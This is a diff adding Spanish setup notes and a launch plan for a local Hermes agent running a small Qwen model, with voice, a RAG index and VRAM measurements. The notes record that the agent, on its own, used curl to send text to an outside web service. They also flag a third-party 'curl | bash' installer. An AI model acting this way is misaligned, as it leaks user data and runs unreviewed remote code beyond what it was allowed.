+```yaml +terminal: + cwd: "~/COFRE/CODERS/JARVIS" +``` + +Verificado: con eso el prompt de sistema pasa a decir +`working directory: ~/COFRE/CODERS/JARVIS`. EstΓ‘ replicado en +`verde/config.yaml` y lo comprueba `pruebas/03_config.sh`. + +**Ojo, que esto ATA el carril a este repositorio.** Es lo correcto para un banco +de pruebas que se compara contra el naranja, y es una limitaciΓ³n real si algΓΊn +dΓ­a se quiere que el verde mire `~/BIKEPARK` o `~/oasis`. Con la raΓ­z en `$HOME` +ademΓ‘s se ahoga: un `search_files` de `*.md` devolvΓ­a sobre todo +`site-packages/` de los venv de `entrena/`. + +**CΓ³mo se diagnosticΓ³, que es reutilizable:** `-z` imprime solo el texto final, +sin las llamadas a herramienta, asΓ­ que desde fuera no se ve nada. Todo queda en +`~/.hermes/state.db`, tabla `messages`, columnas `tool_calls` y `content`: + +```bash +python3 -c " +import sqlite3 +c = sqlite3.connect('file:$HOME/.hermes/state.db?mode=ro', uri=True) +for r in c.execute('SELECT role, tool_name, tool_calls, content FROM messages ORDER BY rowid DESC LIMIT 10'): + print(r) +" +``` + +Sin mirar ahΓ­, este fallo se atribuye al modelo y se acaba cambiando de modelo +para nada. + +## Por quΓ© se parΓ³: `dataset.py` + +El arranque en GPU quedΓ³ **aplazado**, no descartado. La grΓ‘fica la tiene un +trabajo tuyo: `JARVIS/entrena/dataset.py`, que genera pares pregunta-respuesta +de COFRE con `qwen3.5:4b-jarvis`. Son **7-10 horas** (tu propio README lo dice) y +va por `100/2261 fragmentos`. + +Detalle que confunde y conviene tener escrito: mientras ese script corra, +`ollama stop qwen3.5:4b-jarvis` **parece no funcionar**. SΓ­ funciona β€” descarga +el modelo β€” pero la siguiente peticiΓ³n del script lo vuelve a cargar en +segundos. No es un fallo de ollama. + +Comprobado que los `ollama stop` **no rompieron** la generaciΓ³n: siguiΓ³ de 199 a +224 ejemplos en 75 s. + +### Retomar cuando termine + +```bash +# 1. confirmar que dataset.py acabΓ³ y la tarjeta estΓ‘ libre +pgrep -f 'entrena/dataset.py' || echo "terminado" +nvidia-smi --query-gpu=memory.used --format=csv,noheader # ~140 MiB + +# 2. medir si 24576 cabe +curl -s http://127.0.0.1:11434/v1/chat/completions -H 'Content-Type: application/json' \ + -d '{"model":"qwen3.5:4b-verde","messages":[{"role":"user","content":"ok"}],"max_tokens":5}' +curl -s http://127.0.0.1:11434/api/ps | python3 -m json.tool | grep -E 'size_vram|context_length' + +# 3. decirle a Hermes el contexto REAL (si no, cree que son 262144) +# en ~/.hermes/config.yaml, bloque model:, en las lineas canonicas (~82/~95) +# default: "qwen3.5:4b-verde" +# context_length: 24576 + +# 4. LA PRUEBA DECISIVA, antes de abrir el TUI: ΒΏemite tool_calls? +curl -s http://127.0.0.1:11434/v1/chat/completions -H 'Content-Type: application/json' -d '{ + "model":"qwen3.5:4b-verde", + "messages":[{"role":"user","content":"ΒΏCuΓ‘nto espacio libre queda en el disco?"}], + "tools":[{"type":"function","function":{"name":"ejecuta_comando", + "description":"Ejecuta un comando de shell", + "parameters":{"type":"object","properties":{"comando":{"type":"string"}},"required":["comando"]}}}]}' \ + | python3 -m json.tool +``` + +El paso 4 separa dos preguntas que juntas se contestan mal: *ΒΏsabe el modelo +emitir una llamada?* y *ΒΏfunciona Hermes?*. Si sale `tool_calls` con JSON +vΓ‘lido, lo que falle despuΓ©s es de Hermes. Si contesta en prosa, abrir el TUI +solo darΓ­a un fallo mΓ‘s confuso. + +DespuΓ©s, la escalera del plan: "hola" β†’ una herramienta β†’ ficheros β†’ **varias +vueltas encadenadas** (el escalΓ³n que separa un chatbot de un agente) β†’ skills. +La voz al final, y la escucha la ΓΊltima de todas: los 839 MiB de pico de whisper +contra una tarjeta que tendrΓ‘ el modelo casi entero. + +## Estado de la grΓ‘fica + +| | VRAM | QuiΓ©n | +|---|---|---| +| Antes de instalar | 878 MiB de 4096 | tres `whisper-server` tuyos, del naranja | +| DespuΓ©s de instalar | **127 MiB de 4096** | nadie; tus whisper acabaron solos | + +Instalar **no cargΓ³ nada** en la tarjeta. Comprobado con +`nvidia-smi --query-compute-apps` y con `/api/ps` de Ollama, que devolviΓ³ +`{"models": []}` en todo momento. + +De paso, un dato que puede interesarte del naranja: llegaste a tener **tres +`whisper-server` a la vez**, ~880 MiB cada uno, 2648 MiB en total sobre una +tarjeta de 4096. Es el escenario exacto del `CUDA error: out of memory` que +documenta el README. No hice nada al respecto β€”es tu desarrollo en marchaβ€” pero +queda anotado. + +## VerificaciΓ³n en frΓ­o, ejecutada + +| ComprobaciΓ³n | Resultado | +|---|---| +| `hermes` en PATH | `~/.local/bin/hermes` | +| TamaΓ±o de `~/.hermes` | 2,2 GB | +| CachΓ© de Playwright | 622 MB | +| Credenciales con valor en `.env` | **0** | +| Tokens de mensajerΓ­a | **0** (por eso el gateway nunca arrancΓ³) | +| URLs de nube activas en `config.yaml` | **0** | +| Puertos fuera de loopback | **ninguno** | +| Modelos cargados en Ollama | ninguno | +| Puente de voz | **funciona**: 0,34 s para 3,2 s de audio, 22050 Hz mono | + +Las 11 lΓ­neas con contenido del `.env` no son claves: son `TERMINAL_TIMEOUT`, +`BROWSER_SESSION_TIMEOUT`, banderas de depuraciΓ³n y similares. + +## Trampa: claves YAML duplicadas en config.yaml + +**Esto casi cuela y merece quedar escrito.** El `config.yaml` que genera el +instalador declara `provider` y `base_url` **dos veces** dentro del bloque +`model:`: una arriba, junto a `default`, y otra ~45 lΓ­neas mΓ‘s abajo. En YAML la +ΓΊltima repeticiΓ³n gana. + +Al configurar Ollama arriba, el fichero *parecΓ­a* correcto leyΓ©ndolo, y al +parsearlo salΓ­a esto: + +``` +model.provider: auto +model.base_url: https://openrouter.ai/api/v1 +``` + +Es decir: el carril habrΓ­a salido **por OpenRouter** creyendo yo que iba a +localhost. Se arreglΓ³ dejando los valores solo en las lΓ­neas de abajo, las +canΓ³nicas. + +**La lecciΓ³n, que vale para todo este fichero:** con 1890 lΓ­neas y 121 activas, +no basta con leerlo. Hay que parsearlo: + +```bash +python3 -c "import yaml;d=yaml.safe_load(open('$HOME/.hermes/config.yaml'));print(d['model'])" +``` + +## Trampa: la instalaciΓ³n de Chromium se cuelga + +Le pasa a mΓ‘s gente (issue #35166 del repo). El zip se descarga entero y la +**extracciΓ³n se queda parada**: 50 minutos de reloj con 1 segundo de CPU y cero +crecimiento en `~/.cache/ms-playwright/`. El `timeout` del instalador mata al +padre y deja procesos huΓ©rfanos reteniendo un `__dirlock`, asΓ­ que el reintento +tambiΓ©n falla. + +Se resolviΓ³ a mano, y si vuelve a pasar tras un `hermes update`, esta es la +receta: + +```bash +pkill -f oopDownloadBrowserMain; pkill -f 'playwright install' +rm -rf ~/.cache/ms-playwright/chromium-1208 ~/.cache/ms-playwright/__dirlock +mkdir -p ~/.cache/ms-playwright/chromium-1208 +unzip -q /tmp/playwright-download-*/playwright-download-chromium-*.zip \ + -d ~/.cache/ms-playwright/chromium-1208/ +touch ~/.cache/ms-playwright/chromium-1208/INSTALLATION_COMPLETE +``` + +El `INSTALLATION_COMPLETE` es lo que Playwright mira para dar el navegador por +bueno (`lib/server/registry/index.js:1345`). Sin Γ©l lo reinstala cada vez. + +Quedaron los tres componentes, verificados con `playwright install --dry-run`: + +| | TamaΓ±o | +|---|---| +| `chromium-1208` | 364 MB | +| `chromium_headless_shell-1208` | 254 MB | +| `ffmpeg-1011` | 4,9 MB | + +El binario responde: `Google Chrome for Testing 145.0.7632.6`. + +## Resuelto: tu voz afinada SÍ se puede reutilizar + +Era la pregunta abierta del plan, y saliΓ³ el mejor de los tres desenlaces. + +**Hermes tiene un proveedor de TTS por comando que no estΓ‘ documentado en su +web.** EstΓ‘ en `tools/tts_tool.py`, bloque *"Custom command providers"*: + +```yaml +tts: + provider: mi-voz + providers: + mi-voz: + type: command + command: "... {output_path} {input_path}" + output_format: wav +``` + +Marcadores: `{input_path}`, `{text_path}`, `{output_path}`, `{format}`, +`{voice}`, `{model}`, `{speed}`. Ejecuta con `shell=True`. + +Eso permite llamar al mismo `config/jarvis-piper.sh` que usa el naranja, asΓ­ que +**el verde suena exactamente igual**: mismo binario Piper 1.2.0, mismo `.onnx`, +misma cadena de audio. Sin esto la comparaciΓ³n de voz entre carriles no habrΓ­a +valido nada. + +Dos detalles que obligaron a escribir `voz-verde.sh` en vez de meter el comando +directo en el YAML: + +1. **El entorno se limpia.** `_run_command_tts` llama a + `hermes_subprocess_env(inherit_credentials=False)`, asΓ­ que + `JARVIS_PIPER_VOZ` y `JARVIS_PIPER_TONO` no llegarΓ­an. Se ponen dentro del + adaptador. +2. **Las interfaces no encajan.** `jarvis-piper.sh` quiere el texto como + argumento; Hermes entrega un fichero. El adaptador hace de puente. + +### QuΓ© voz, y ojo con el README + +`voz-verde.sh` usa **davefx a tono 1.0**, que es lo que tiene el nΓΊcleo hoy +(`nucleo/boca/voz.py`: `POR_DEFECTO = "davefx"`, `JARVIS_PIPER_TONO = "1.0"`). + +El `README.md` del repo describe `sharvard` + 0,86 = 106 Hz como *"la puesta"*. +Eso era el JARVIS sobre Newelle. **El verde copia al nΓΊcleo, que es contra quien +se va a comparar, no al README.** Si algΓΊn dΓ­a el nΓΊcleo vuelve a sharvard, hay +que cambiarlo aquΓ­ tambiΓ©n. + +### De paso: el Piper de Hermes es el GPL, no el tuyo + +El proveedor `piper` de serie usa `OHF-Voice/piper1-gpl` (GPL-3.0). El tuyo es +el original `rhasspy/piper` 1.2.0, **MIT**, archivado en octubre de 2025. Los dos +son software libre; no son el mismo paquete. Como usamos el comando y no el +proveedor de serie, el verde habla con **tu** Piper MIT. + +## El cerebro: lo que hay que vigilar + +Configurado como proveedor `custom` contra `http://127.0.0.1:11434/v1` con +`qwen3.5:4b-jarvis`. Ollama ya habla OpenAI, no hace falta puente. + +**Pero la propia guΓ­a de Hermes avisa de algo que hay que probar.** Su tabla de +modelos locales dice, literalmente, que para trabajo agΓ©ntico completo hace +falta `gemma4:31b`, y marca *sin* tool calling a todo lo de 9B para abajo: + +| Modelo (su tabla) | Tool calling | +|---|---| +| `gemma4:31b` | SΓ­ | +| `gemma2:27b` | No | +| `gemma2:9b` | No | +| `llama3.2:3b` | No | + +Su tabla no lista qwen3.5, que **sΓ­** hace tool calling β€” el commit +*"nucleo: el cerebro con tool calling nativo"* lo demuestra. Pero lo demuestra +**en tu arnΓ©s**, no en el de Hermes, que inyecta muchas mΓ‘s definiciones de +herramientas por vuelta. AsΓ­ que: + +- Es lo primero que hay que comprobar al arrancar: si el 4B llama herramientas + bien dentro de Hermes o se atraganta. +- Si se atraganta, esta mΓ‘quina tiene **62 GB de RAM**: un modelo grande cabe, + aunque irΓ­a por CPU (~2-5 tok/s segΓΊn su guΓ­a, 30-120 s por respuesta). Para + eso estΓ‘ `HERMES_API_TIMEOUT=1800` documentado en `env.ejemplo`. +- `qwen3.5:9b` (6,14 GB) es el escalΓ³n intermedio, y solo con el naranja cerrado. + +**Aviso de contexto:** si se define `num_ctx` propio en Ollama, hay que poner el +mismo en Hermes. Su `/api/show` reporta el contexto *mΓ‘ximo* del modelo, no el +configurado, asΓ­ que Hermes puede creer que tiene mΓ‘s sitio del que hay. + +## Antes de comparar los dos carriles: no midas peras y manzanas + +El naranja tiene **150 acciones rΓ‘pidas que se saltan el modelo**: "ΒΏcuΓ‘nto +espacio queda?" es un `df`, no una inferencia. Hermes **no tiene ese atajo** β€” +allΓ­ toda orden pasa por el cerebro, con las herramientas, las skills y la +memoria en contexto en cada vuelta. + +El verde va a medir mΓ‘s lento, y **no serΓ‘ culpa del modelo**. Para comparar de +verdad hay que usar solo las frases que hoy *no* encajan en el catΓ‘logo y acaban +en el cerebro: son las ΓΊnicas donde los dos hacen lo mismo. Las hay anotadas en +`config/jarvis-sin-accion.jsonl`. + +## Pendiente: dependencias de sistema de Playwright + +El instalador pidiΓ³ `sudo` para las librerΓ­as de sistema de Chromium, se declinΓ³ +(no hay sudo sin contraseΓ±a) y **degradΓ³ solo**: instalΓ³ el binario en la cachΓ© +del usuario. Chromium arrancarΓ‘ si las librerΓ­as ya estΓ‘n; si se queja, esto es +lo que hay que correr una vez: + +```bash +cd ~/.hermes/hermes-agent && sudo npx playwright install-deps chromium +``` + +## QuΓ© se descargarΓ‘ el primer dΓ­a que arranques + +Nada de esto ha pasado todavΓ­a. Que no sorprenda: + +| | CuΓ‘ndo | CuΓ‘nto | +|---|---|---| +| Modelo de whisper `small` | primera transcripciΓ³n | ~500 MB en disco, 839 MiB de pico en GPU | +| Modelo de Ollama | ninguno β€” `4b-jarvis` ya estΓ‘ | 0 | +| Voces de Piper | ninguna β€” usamos las tuyas | 0 | + +`stt.local.unload_after_idle_seconds: 300` estΓ‘ puesto justo por los 839 MiB: +suelta whisper tras cinco minutos de silencio y le devuelve el hueco al modelo. +Cuesta una recarga en la frase siguiente. + +## Se instalΓ³ tambiΓ©n el driver de Computer Use + +Va en la instalaciΓ³n completa. Es el que permitirΓ­a a un agente **controlar +ratΓ³n y teclado del escritorio**, no solo el navegador. Instalado no es lo mismo +que activo β€” hoy no hay nada que lo invoque β€” pero conviene saber que estΓ‘ antes +de dar permisos a algo. Si se quiere fuera: `--skip-computer-use`. + +**Dato que sΓ­ importa en esta mΓ‘quina:** ese driver no viene de Nous. El +instalador lo trae con un `curl | bash` contra **terceros**: + +``` +https://raw.githubusercontent.com/trycua/cua/main/libs/cua-driver/scripts/install.sh +``` + +O sea que el envoltorio `instalar.sh` audita el instalador de Hermes, pero ese +instalador se descarga y ejecuta otro script de otro repo sin que nadie lo mire. +Con COFRE en esta mΓ‘quina, merece una lectura antes del prΓ³ximo `hermes update`. +EstΓ‘ en `~/.hermes/hermes-agent`, y el binario resultante tambiΓ©n. + +## Las 104 pruebas del naranja: NO se ejecutaron + +El plan decΓ­a correr `pruebas/ejecutar.sh` para comprobar que el naranja seguΓ­a +dando el mismo nΓΊmero. **No se hizo**, y a propΓ³sito: esa suite abre la +aplicaciΓ³n y carga el modelo, que es exactamente lo que se pidiΓ³ no hacer +mientras el naranja estaba en desarrollo. + +Queda pendiente para cuando pares de desarrollar: + +```bash +cd ~/COFRE/CODERS/JARVIS/pruebas && ./ejecutar.sh +``` + +En su lugar se comprobΓ³ lo que sΓ­ se podΓ­a en frΓ­o: que la grΓ‘fica quedΓ³ libre y +que el verde no escribiΓ³ fuera de su sitio. Todo lo suyo vive en `verde/`, en +`~/.hermes/`, mΓ‘s tres ficheros de escritorio (`~/.local/share/icons/jarvis-verde.png`, +`~/.local/share/applications/jarvis-verde.desktop`) y la cachΓ© de Playwright. + +Los 13 ficheros que `git status` da por modificados son **todos anteriores** a +esta sesiΓ³n: el mΓ‘s reciente es `config/set_persona.py` a las 13:22 y esto +empezΓ³ a las 16:09. Y los ficheros nuevos que aparecen en `nucleo/` despuΓ©s de +esa hora β€”`arranca.sh`, `estado.py`, `ventana.sh`, `pruebas/prueba_cara.py`…— +son **tu desarrollo del naranja de esta tarde**: no existΓ­an cuando se listΓ³ esa +carpeta al empezar. + +## La duda del 4B: resuelta, y a favor (16 ago) + +Era la pregunta abierta del carril β€” la guΓ­a de Hermes marca *sin* tool calling +todo lo de 9B para abajo y recomienda `gemma4:31b` para trabajo agΓ©ntico. + +**`qwen3.5:4b` llama herramientas bien dentro de Hermes.** Comprobado primero +contra el endpoint pelado (`pruebas/04_tool_calling.sh`, tres casos) y despuΓ©s +en el arnΓ©s completo, con las 19 herramientas en contexto: + +| Caso | Resultado | +|---|---| +| Pide herramienta cuando hace falta | `terminal {"command": "df -h ."}` | +| Acierta la herramienta y sus **dos** argumentos | `escribe_fichero {"ruta": …, "contenido": …}` | +| **No** llama cuando no hace falta ("ΒΏcuΓ‘nto son dos mΓ‘s dos?") | contesta `4` en prosa | + +El tercero importa tanto como los otros: un modelo que llama siempre es tan +inΓΊtil como uno que no llama nunca, y con una sola pregunta no se distinguen. + +## El escalΓ³n 6: habla, y con la voz del naranja (16 ago) + +`text_to_speech` β†’ proveedor `jarvis-piper` β†’ `voz-verde.sh` β†’ +`config/jarvis-piper.sh`. Comparado el WAV que saliΓ³ de Hermes con el que genera +la prueba `07_voz.sh` llamando al adaptador a pelo: + +| | Hermes | Directo | +|---|---|---| +| Frecuencia | 22050 Hz | 22050 Hz | +| Canales | 1 | 1 | +| Bits | 16 | 16 | + +IdΓ©nticos, que era el objetivo: mismo binario Piper 1.2.0 MIT, mismo `.onnx`, +mismo tono. **La comparaciΓ³n de voz entre los dos carriles vale**, que es para +lo que se montΓ³ el adaptador. + +De propina, sin que nadie se lo pidiera contestΓ³ *"Perfecto, seΓ±or"* y *"Todos +mis sistemas estΓ‘n listos para sus Γ³rdenes"*. El registro de JARVIS sale del +`SOUL.md` de Hermes, no de la persona del naranja, y aun asΓ­ coincide. + +Queda el juicio que no es medible: si suena bien. El fichero estΓ‘ en +`~/.hermes/cache/audio/`. + +## EL ESCALΓ“N 5 ROMPIΓ“ LA PREMISA: el agente se fue a internet solo (16 ago) + +Esto es lo mΓ‘s serio de la sesiΓ³n de estreno y hay que leerlo antes que nada. + +Se le pidiΓ³ *"hazme un cartel en arte ascii que ponga JARVIS"* β€” a propΓ³sito sin +nombrar ninguna skill, que es lo que medΓ­a el escalΓ³n. Lo que hizo: + +| # | Llamada | Resultado | +|---|---|---| +| 1 | `skill_view {"name": "ascii-art"}` | **eligiΓ³ la skill sola** βœ“ | +| 2 | `python3 -m pyfiglet "JARVIS" --font slant` | `No module named pyfiglet` | +| 3 | `curl https://asciified.thelicato.io/api/v2/ascii?text=JARVIS` | **saliΓ³ a internet** | + +Nadie le dijo que podΓ­a. La skill menciona pyfiglet, pyfiglet no estΓ‘ instalado, +y el modelo resolviΓ³ el hueco **buscando el servicio equivalente en la web** y +mandΓ‘ndole el texto a un tercero. + +### Por quΓ© no lo cazaba nada + +`pruebas/06_privacidad.sh` pasa, y seguirΓ‘ pasando: comprueba **configuraciΓ³n** +β€”cero credenciales, cero URLs de nube en el YAML, nada escuchando fuera de +loopbackβ€” y esto no es configuraciΓ³n, es **conducta en marcha**. El agente tiene +una terminal y la terminal tiene `curl`. No hay ajuste que lo impidiera. + +Es una diferencia de fondo con el naranja, y conviene que quede escrita: el +naranja ejecuta un catΓ‘logo cerrado de 150 acciones. El verde **decide quΓ© +ejecutar**, y ese es justo su valor y justo su riesgo. No se puede tener lo uno +sin lo otro. + +### Lo que se puede hacer, por orden de menos a mΓ‘s invasivo + +1. **Instalar lo que las skills dan por hecho** (`pip install pyfiglet`). Quita + el motivo, no la capacidad. Es parche, no soluciΓ³n. +2. **Apagar las skills que tiran de red**: `hermes skills disable `. +3. **Recortar herramientas** en `platform_toolsets` del `config.yaml`, que ya + estaba apuntado como palanca para el contexto y sirve para esto tambiΓ©n. +4. **Cortar por debajo**: regla de cortafuegos para el proceso, o terminal en + contenedor sin red. `hermes egress` **no vale** para esto β€” es iron-proxy, + un proxy que INYECTA credenciales en las salidas, no un bloqueo. + +**No he aplicado ninguna.** Cualquiera de ellas cambia lo que el carril sabe +hacer, y eso es una decisiΓ³n del usuario, no una correcciΓ³n tΓ©cnica. + +### Y el cartel saliΓ³ mal + +Aparte de todo lo anterior: el banner que `curl` devolviΓ³ era correcto, y al +copiarlo a su respuesta final el modelo **lo destrozΓ³**. Mismo patrΓ³n que la +lista de ficheros del escalΓ³n 4: el 4B razona bien la cadena y es descuidado +reproduciendo texto literal largo. 4 min 58 s en total. + +## El escalΓ³n 7 (la escucha) cabe, y por un motivo que sorprende (16 ago) + +El plan lo dejaba para el final temiendo un `CUDA error: out of memory`: whisper +`small` pide **839 MiB en el pico** de la transcripciΓ³n y la tarjeta son 4096. +Medido con el verde cargado y trabajando: + +| | MiB | +|---|---| +| Tarjeta | 4096 | +| Ocupado por el modelo verde (65536 ctx, 16 capas) | 2902 | +| **Libre** | **1062** | +| Pico de whisper `small` | 839 | +| Margen | **223** | + +**Cabe.** Y lo que sorprende es que el verde deja **mΓ‘s** sitio que el naranja: +2902 MiB contra los 2941 del reparto automΓ‘tico de ollama para +`qwen3.5:4b-jarvis`. Bajar 16 capas a la CPU libera tarjeta, asΓ­ que el precio +que se paga en velocidad se cobra en VRAM. + +Sigue siendo justo β€”223 MiBβ€” y falta la prueba de verdad, que necesita +micrΓ³fono. Pero la aritmΓ©tica que hacΓ­a temer el escalΓ³n ya no dice lo que +decΓ­a. + +## Para probar cuando arranques + +- **Tema del panel web.** `dashboard.theme` acepta `default`, `midnight`, + `ember`, `mono`, `cyberpunk`, `rose`. No he podido ver sus paletas (el panel + va empaquetado), pero `cyberpunk` o `mono` son los candidatos a pegar con el + verde. El TUI no tiene tema: ahΓ­ el color lo pone `verde-launcher.sh` con + secuencias OSC. +- **Los escalones 5, 6 y 7** de `ESCALERA.md`: una skill, la voz dentro de + Hermes y la escucha por micrΓ³fono. Los tres piden criterio u oΓ­do, o el + micrΓ³fono, asΓ­ que no se automatizan. +- **Si merece la pena la palanca del KV cachΓ©.** `OLLAMA_FLASH_ATTENTION=1` + + `OLLAMA_KV_CACHE_TYPE=q8_0` partirΓ­a el cachΓ© por la mitad y devolverΓ­a capas + a la tarjeta, que es justo lo que hoy cuesta el tiempo de respuesta. **No se + ha aplicado**: es del servicio de ollama y afectarΓ­a tambiΓ©n al naranja. + +## Noche del 16-17 ago: voz de entrada, RAG y frontal a nivel del naranja + +Encargo: subir el verde al nivel del naranja en voz, RAG y frontal. Todo local, +nada a gitea (pendiente de revisiΓ³n). + +### La escucha, resuelta y en local (escalΓ³n 7 cerrado sin micro) + +El TUI de Hermes no tiene micrΓ³fono, y su STT nativo (`stt:` del config) es para +notas de voz de **mensajerΓ­a** β€” saldrΓ­an de la mΓ‘quina. AsΓ­ que se puentea: + +- `verde/escucha_transcribe.py` β€” WAV β†’ texto con **faster-whisper `small`** + (el mismo que declara el config), en **CPU** a propΓ³sito: el 4B ocupa la + tarjeta y el margen es de 223 MiB; whisper en CPU tarda ~12 s por frase y no + arriesga OOM. No llama a ninguna API. +- `verde/escucha-verde.sh` β€” pulsar-para-hablar: graba (pw-record/arecord/parec) + β†’ transcribe β†’ `hermes chat --reasoning none -q` β†’ responde; `--habla` lo dice + con la voz del verde, `--seguido` encadena turnos. +- `verde/pruebas/08_escucha.sh` β€” **8/8**. Bucle TTSβ†’STT sin micro: genera voz + con el `07`, la transcribe y comprueba que vuelven las palabras clave. Mide y + verifica que el transcriptor no referencia APIs remotas. + +Medido: "hola jarvis verde cuanto espacio libre queda en el disco" β†’ *"ΒΏCuΓ‘nto +espacio libre queda en el disco?"* (solo pierde "jarvis"β†’"harvis", nombre raro). + +Latencia honesta: la ESCUCHA va bien (~12 s CPU). El cuello es el 4B (minutos +por turno). El puente sirve para PROBAR que el verde oye, no como diario. + +### RAG del naranja, disponible en el verde + +El agente ya puede consultar el mismo Γ­ndice que el nΓΊcleo (14.949 entradas): + +- `nucleo/saber/busca_cli.py` β€” CLI sobre `saber.busca` (texto o `--json`). +- Skill local `~/.hermes/skills/research/buscar-en-apuntes/` β€” le dice al agente + cuΓ‘ndo y cΓ³mo buscar (herramienta de terminal, local). `hermes skills list`: + `buscar-en-apuntes Β· research Β· local Β· enabled`. + +### Skills de ECC (el ganador del hackathon de Claude) + +Instaladas 4 por `hermes skills install` (escaneadas SAFE): `security-review`, +`git-workflow`, `python-testing`, `coding-standards`. Total 82 skills. El prompt +fijo apenas sube (29 KB, lejos de 64k). Probada `security-review` con el 4B: +checklist correcto, 4 min 30 s en frΓ­o. + +## Noche: expansiΓ³n del RAG + reentrenamiento (auto mode, local, sin gitea) + +Contenido aΓ±adido al Γ­ndice PERSONAL (nunca al pΓΊblico sin revisar licencias): +- **Strix** (usestrix/strix, agente IA de pentesting) clonado en CODERS; sus docs + (README, docs/, AGENTS, benchmarks) indexados β†’ 49 fragmentos. +- **6 awesome lists** mΓ‘s: sysadmin, cli-apps, security, pentest, shell, linux + (catΓ‘logo pasa de 385 a 740 fragmentos). En awesome.py, publico=False. +- **Apps instaladas** de esta mΓ‘quina: nucleo/saber/instalado.py lee los .desktop + (146 apps) + apt-mark showmanual (22 fragmentos). Personal por definiciΓ³n. +- Índice personal: ~49 MB. Reindex raw hecho; contenido recuperable ya. + +Reentrenamiento nocturno: nucleo/saber/enriquece/reentrena_noche.sh encadena +sΓ­ntesis de ganchos del contenido nuevo β†’ reindex β†’ eval β†’ refresco COFRE +(cosecha+sintetiza) β†’ reindex final. Corre detached, log en datos/reentrena_noche.log. + +Pendiente de revisar por la maΓ±ana: licencias de las 6 awesome nuevas antes de +subir nada; y decidir quΓ© de todo esto va al Γ­ndice pΓΊblico / gitea. + +## Cierre de la noche (07:52) β€” nΓΊmeros y decisiones + +Dos rondas de reentrenamiento. Índice final: **64 MB, 19.578 entradas** (12.260 +preguntas-gancho, 1.383 catΓ‘logo, 168 apps, 459 metodologΓ­a incl. strix). + +Retrieval (eval_set ampliado a 57 casos = 45 pentest + 12 amplitud): +- Ronda 1: hit@1 77%, hit@5 96% +- Ronda 2 (+osint/devops/docker/go/python): hit@1 **75%**, hit@5 **96%** +- Amplitud sola (apps/self-hosted/cli/linux/strix): hit@1 75%, hit@5 **100%** + +**Intercambio medido:** pentest puro pasΓ³ de 82% (antes de la noche) a ~75% de +hit@1; hit@5 se mantiene 95-96%. Es el precio de la amplitud. Las listas gigantes +(awesome-go, 3197 items β†’ 322 fragmentos; osint con algΓΊn artefacto de TOC) son +las que mΓ‘s ruido meten y menos aporta a consultas por voz. + +**Decisiones para la maΓ±ana:** +1. Licencias de las 12 awesome lists antes de publicar nada (ahora todas + publico=False = solo Γ­ndice personal). +2. Si se prioriza precisiΓ³n pentest: quitar awesome-go (y quizΓ‘ awesome-python) + recuperarΓ­a 1-2 pts de hit@1 sin perder casi cobertura ΓΊtil. +3. QuΓ© del contenido nuevo va al Γ­ndice pΓΊblico / gitea (hoy: nada subido). diff --git a/verde/PLAN-ARRANQUE.md b/verde/PLAN-ARRANQUE.md new file mode 100644 index 0000000..f544043 --- /dev/null +++ b/verde/PLAN-ARRANQUE.md @@ -0,0 +1,188 @@ +# Carril verde: dejarlo listo para lanzar de un tirΓ³n + +> **Ejecutado el 16 de agosto de 2026.** Este fichero se deja como estaba, que es +> el registro de lo que se planeΓ³. Lo que pasΓ³ al ejecutarlo β€”incluidos dos topes +> que el plan no anticipaba, el suelo de 64k de Hermes y el directorio de trabajo +> en `$HOME`β€” estΓ‘ en `NOTAS.md`. Y una parte del plan quedΓ³ desmentida por los +> hechos: la escalera de contexto de `arrancar.sh` (24576 β†’ 20480 β†’ 16384) buscaba +> el nΓΊmero equivocado, porque por debajo de 64.000 Hermes no arranca. + +## Contexto + +El verde estΓ‘ instalado y configurado, pero **sin estrenar**. El primer arranque +quedΓ³ aplazado por dos motivos, uno tΓ©cnico y uno de agenda: + +1. **El prompt fijo de Hermes no cabe.** Medido con `hermes prompt-size` desde el + directorio real de arranque: 26.281 B de sistema + 55.978 B de esquemas de 19 + herramientas = **82.259 B β‰ˆ 20.500 tokens**, contra los **4.096** de `num_ctx` + de `qwen3.5:4b-jarvis`. Y un segundo tope escondido, `num_predict 300`, que el + naranja hereda del modelo *base* y que cortarΓ­a el JSON de una tool call por + la mitad. Ya existe `qwen3.5:4b-verde` para resolverlo, pero a 32k de contexto + da `cudaMalloc failed: out of memory` y falta encontrar el techo real. +2. **La grΓ‘fica estΓ‘ ocupada** por `entrena/dataset.py`, un trabajo tuyo de 7-10 + horas que va por `100/2261` fragmentos. + +**Objetivo de este plan:** que cuando el dataset termine, arrancar y probar el +verde sea **un comando**, sin re-derivar nada de lo anterior ni recordar en quΓ© +orden iba. Todo lo que una mΓ‘quina puede decidir sola, automatizado; lo que +necesita tu oΓ­do y tu criterio, escrito en una escalera con huecos para anotar. + +## Paso 0 β€” Guardar esto en el repo (primero, y son dos segundos) + +Este plan vive en `~/.claude/plans/`, fuera del repo. Lo primero es copiarlo a +**`verde/PLAN-ARRANQUE.md`** y enlazarlo desde `verde/README.md`, para que estΓ© +donde estΓ‘ todo lo demΓ‘s y sobreviva a cerrar la terminal. + +Ya estΓ‘ a salvo en el repo, y no hace falta rehacerlo: `NOTAS.md` (17 KB, con el +bloqueo del contexto, la variante del modelo, las trampas del `config.yaml` y los +pasos para retomar), `README.md`, `config.yaml`, `env.ejemplo`, +`qwen3.5-4b-verde.Modelfile`, `instalar.sh`, `verde-launcher.sh`, `voz-verde.sh`, +`jarvis-verde.svg` y `boveda/README.md`. La configuraciΓ³n aplicada en +`~/.hermes/` y el modelo `qwen3.5:4b-verde` en ollama tambiΓ©n persisten. + +`model.default` sigue apuntando a `qwen3.5:4b-jarvis` **a propΓ³sito**: cambiarlo +al verde sin fijar antes `context_length` serΓ­a peor que dejarlo, porque Hermes +se creerΓ­a los 262.144 que reporta `/api/show`. Lo cambia `arrancar.sh` cuando +haya medido el techo real. + +## Lo que se construye + +### 1. `verde/arrancar.sh` β€” el comando ΓΊnico + +Hace en orden lo que hoy habrΓ­a que hacer a mano, y **se planta en cuanto algo +no cuadra** en vez de seguir y dar un fallo confuso mΓ‘s adelante. + +```bash +./verde/arrancar.sh # medir, configurar y dictaminar +./verde/arrancar.sh --solo-medir # sin tocar la configuracion +``` + +Pasos: + +- **Guarda de entrada.** Si `entrena/dataset.py` sigue vivo, se para y lo dice: + competir con Γ©l por la tarjeta estropea las dos cosas. `--igual` lo salta. + TambiΓ©n cierra los restos del naranja (`nucleo/jarvis.py`, `whisper-server`) y + hace `ollama stop qwen3.5:4b-jarvis`, comprobando que la VRAM baja a ~140 MiB. + +- **Busca el techo de contexto, midiendo.** Recrea `qwen3.5:4b-verde` bajando + `num_ctx` hasta que cargue de verdad, y anota la VRAM de cada 